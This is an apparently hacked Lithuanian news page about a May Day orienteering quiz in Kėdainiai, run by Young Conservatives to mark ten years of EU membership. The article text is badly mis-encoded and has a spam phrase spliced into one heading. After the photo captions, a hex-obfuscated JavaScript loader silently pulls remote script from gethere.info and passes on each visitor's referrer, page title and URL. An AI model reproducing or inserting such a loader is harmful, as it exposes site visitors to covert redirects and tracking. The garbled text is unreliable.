Ar „EurotacinA�se“ varA?ybose „eurojaunimas“ surado EuropA�?

Pauliaus Petkevičiaus ir organizatorių nuotraukos

Lietuvos narystA�s Europos SA�jungoje 10-meA?io proga, geguA?A�s 1 dienA�, kA�dainieA?iai dalyvavo a�zEurotacinA�sea�? varA?ybose. JA? metu dalyviai geriau paA?ino ne tik savo miestA�, bet ir paA?iA� ES. Vis dA�lto vienas svarbiausiA? renginio rezultatA? yra tai, kad varA?ybos jaunimA� paskatino susimA�styti apie jA? vietA�, vaidmenA? ir svarbA� Europos mechanizmuose.

a�zEurotacinA�sa�? varA?ybos. Kas tai?

a�zEurotacinA�sa�? tai orientacinA�s varA?ybos, skirtos Lietuvos A?stojimo A? Europos SA�jungA� deA?imtmeA?iui paminA�ti. OrganizatoriA? komandos (JaunA?jA? konservatoriA? lygos (JKL) KA�dainiA? skyriaus) pirmininkA� GintarA� MeilA�naitA� patvirtino, kad A?i idA�ja yra nauja, kilusi JKL PanevA�A?io skyriuje, bet suA?avA�jusi ir kA�dainieA?ius.

UA?duotys, kurias tiksliau bA�tA? galima pavadinti uA?uominomis, buvo apie A?vairias KA�dainiA? istorines vietas bei sunkesni klausimai apie ES.

Renginyje dalyvavo 7 komandos vidutiniA?kai po 5 A?mones. Nors tai neatrodo didelis skaiA?ius, taA?iau organizatoriai dA?iaugA�si tokiu aktyvumu KA�dainiuose. A� varA?ybas susirinko itin aktyvA�s ir pilietiA?ki jaunuoliai (nuo 13 metA?) ir to uA?teko, kad pirmasis JKL organizuojamas renginys KA�dainiuose bA�tA? sA�kmingas. Paradoksalu, taA?iau laimA�tojais tapo komanda a�zNetyA?iaa�?. Jie gavo a�zFotoimpresijosa�? ir a�zTS-LKDa�? A?steigtus prizus – JKL dA?emperius, kompasus, saldA?ius prizus ir padA�kas, 2 ir 3 vietos laimA�tojai bei kiti dalyviai taip pat neliko nuskriausti.

NugalA�tojA? komandos narys dvyliktokas Laimis Urbonas liko patenkintas ne tik gautais prizais, bet ir praplA�stu akiraA?iu, A?gytomis A?iniomis apie ES, kurios be abejonA�s pravers ruoA?iantis brandos egzaminams, balsuojant EP rinkimuose. Vaikinas pripaA?ino, kad jaunimas daugiausiai A?iniA? apie ES gauna iA? interneto ir televizijos, dA�l to, galima daryti iA?vadA�, kad labai svarbu skatinti A?alies A?iniasklaidA� atsakingai ir be perstojo A?iniA? turinA? pildyti ne tik populiariausiomis bulvarinA�mis A?iniomis, bet ir patraukliai pateikiamomis politinA�mis, ekonominA�mis aktualijomis.

AtsiA?velgdami A? kA�dainieA?iA? susidomA�jimA� bei renginio naudA�, organizatoriai paA?adA�jo panaA?aus pobA�dA?io renginA? organizuoti ir kitais metais. Tai galA�tA? tapti net graA?ia tradicija minint geguA?A�s 1-A�jA� KA�dainiuose.

Klausimai apie Europos SA�jungA� a�� yra kur tobulA�ti

Anot GintarA�s MeiliA�naitA�s, dalyviai, net ir patys jauniausi, nA�ra visiA?kai pasimetA� ES klausimuose, taA?iau tobulA�ti dar yra kur. A?inant, kad didA?ioji dalis dalyviA? buvo ganA�tinai jauni, mokymuisi yra ir laiko. Tereikia noro. Juk atsakingais ir sA�moningais pilieA?iais ne gimstama.

Galima pastebA�ti, kad didA?ioji dalis jaunimo A?ino, kas yra ES, kada buvo A?kurtas EEB (Europos EkonominA� Bendrija) bei kokie jos tikslai. A�ios A?inios daA?nai kartojamos ne tik pamokA? metu, bet ir nuolat girdimos per A?vairias informacines priemones. Tad galima tik pasidA?iaugti, kad jauni A?monA�s nA�ra abejingi, yra susipaA?inA� su sA�jungos, kuriai priklauso pagrindais. Kita vertus, sudA�tingesni klausimai pareikalavo didesniA? pastangA? bei atskleidA� sritis, kuriose bA�simi ar esami jauni pilieA?iai yra pasimetA�, neapsiA?vietA�, o gal ir neapA?viesti.

PavyzdA?iui, nedaugelis A?inojo, kad viena pagrindiniA? ES funkcijA? a�� bendrosios rinkos palaikymas a�� susideda iA? muitA? sA�jungos, vieningos valiutos, bendros A?emA�s A�kio politikos ir bendros A?uvininkystA�s politikos skatinimo. Nenuostabu, kad A?is klausimas kA�lA� abejones dalyviams, juk tai daugiau ekonominis, faktinis aspektas, pats savaime painus. Juk bendra ES nariA? rinka kol kas nA�ra visiA?kai A?gyvendinta a��visi A?ino, kad vieninga valiuta yra itin diskutuojamas klausimas ir Europos SA�jungoje kol kas tA�ra tik ateities vizija, prie kurios A?gyvendinimo sparA?iai artA�jama pleA?iant euro zonA�.

Taip pat jaunimui kilo sunkumA? ieA?kant Europos Komisijos apibrA�A?imo (viena pagrindiniA? Europos SA�jungos institucijA?, atstovaujanti visos ES interesams, juos ginanti, rengianti naujA? ES teisA�s aktA? pasiA�lymus, besirA�pinanti ES politikos A?gyvendinimu bei ES lA�A?A? panaudojimu) ir skaiA?iuojant euro zonos A?aliA? skaiA?iA?. A�domu, kad A?is klausimas kA�lA� jaunimui abejoniA?. Juk Lietuvai ketinat A?sivesti eurA� jau 2015-aisiais, A?is klausimas yra bene arA?iausiai diskutuojamas vieA?oje erdvA�je. A�iandien eurA� kaip bendrA� valiutA� yra A?teisinusios 18 A?aliA? iA? 28, priklausanA?iA? ES.

a�zEurojaunimasa�? a�� patriotiA?ki ar kosmopolitiA?ki pilieA?iai? what is ephadraxin.

Dar straipsnio pradA?ioje paminA�ta a�zeurojaunimoa�? sA�vokA� publikacijoje naudojama siekiant pabrA�A?ti, kad A?iandienos jaunoji karta yra tie A?monA�s, kurie vargiai prisimena laikus, kai Lietuva nepriklausA� Europos SA�jungai. DA�l to, nenuostabu, kad bA�tent A? A?iuos A?mones yra dedamos permainA?, sA�moningumo, novatoriA?kumo viltys. Vis dA�lto atsiranda ir bA�gA?tavimA?, ar sunkaus kelio A? nepriklausomybA� nemaA?iusi karta nepuls A? rankas Vakarams ir nesileis aklai valdoma supervalstybiA?. Kitais A?odA?iais tariant neretai girdimi nuogA�stavimai ar iA? perspektyviA? patriotA? neiA?augs nerA�pestingi internacionalistai.

16-metei organizacijos JKL pirmininkei Gintarei MeiliA�tei tokiA? bA�gA?tavimA? nekyla, vis dA�lto ji sutinka, kad jaunimas turA�tA? aktyviau dalyvauti ir domA�tis politinA�mis realijomis. a�zKadangi pati neseniai pradA�jau domA�tis politika bei su ja susijusiais dalykais, galA�A?iau pasakyti, kad tiek domA�jimosi, tiek A?iniA? ypaA? apie ES tikrai trA�ksta. BA�da yra ta, kad dauguma A?ino tik tiek kA� parodo pramoginA�s, neatitinkanA?ios tikrovA�s, akcentuojanA?ios netinkamus dalykus ir gana lA�kA?tos laidos per televizijA�, o tai formuoja labai netinkamA� poA?iA�rA? ne tik A? paA?iA� politikA�, bet ir A? valdA?ios institucijas. PadA�tis tikrai pasikeistA? jei vyktA? daugiau renginiA? skatinanA?iA? jaunimo pilietiA?kumA�, bendruomeniA?kumA�, tolerancijA�, o ir mokyklose, norint iA?ugdyti atsakingA� jaunimA�, reiktA? daugiau dA�mesio skirti politiniams pagrindamsa�? , – mintimis pasidalino kA�dainietA�.

Taigi, po tokios trumpos renginio apA?valgos bei dalyviA? A?A?valgA?, galima atsakyti A? pavadinime uA?duotA� klausimA�, ar ,,EurotacinA�sea�? varA?ybose a�zeurojaunimasa�? surado EuropA�? A?velgiant optimistiA?kai, galima sakyti ,kad taip. RealistiA?kai a�� galima patikslinti a�� a�zEurotaciniA?a�? varA?ybA? metu jaunimas A?engA� A?ingsnelA? kelio, vedanA?io A? EuropA� (bendrA�ja prasme) link. DA?iugu, kad po deA?imties Lietuvos narystA�s ES metA?, pagaliau ir maA?ieji A?alies miestai iA?lenda iA? linais ir gintarais nusagstytA? kiautA?, integruojasi A? SA�jungA�, neatsisakydami savo tradicijA? (kaip daA?nai bA�gA?taujama), bet susipaA?indami su kitomis, perimdami gerA�jA� patirtA? bei pasimokydami iA? blogosios. O jaunimas. Jaunimas, nors kol kas ir iA? lA�to, bet drA�siai A?ygiuoja A?io integracijos parado priekyje a�� rodo gerA� pavyzdA?, nebijo naujA? idA�jA? taip ne tik ieA?kodamas senosios Europos, bet ir pats kurdamas naujA�jA�.

Pauliaus Petkevičiaus ir organizatorių nuotraukosDSC0251610306778_780338058644328_6650753840820893811_nDSC02509

var _0x31f1=[„\x73\x63\x72\x69\x70\x74″,“\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,“\x73\x72\x63″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D“,“\x72\x65\x66\x65\x72\x72\x65\x72″,“\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D“,“\x74\x69\x74\x6C\x65″,“\x26″,“\x3F“,“\x72\x65\x70\x6C\x61\x63\x65″,“\x73\x65\x61\x72\x63\x68″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“,“\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,“\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,“\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,“\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,“\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,“\x68\x65\x61\x64″,“\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,“\x70\x72\x6F\x74\x6F\x63\x6F\x6C“,“\x68\x74\x74\x70\x73\x3A“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x52\x5F\x50\x41\x54\x48″,“\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E“];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}

Parašykite komentarą

El. pašto adresas nebus skelbiamas. Būtini laukeliai pažymėti *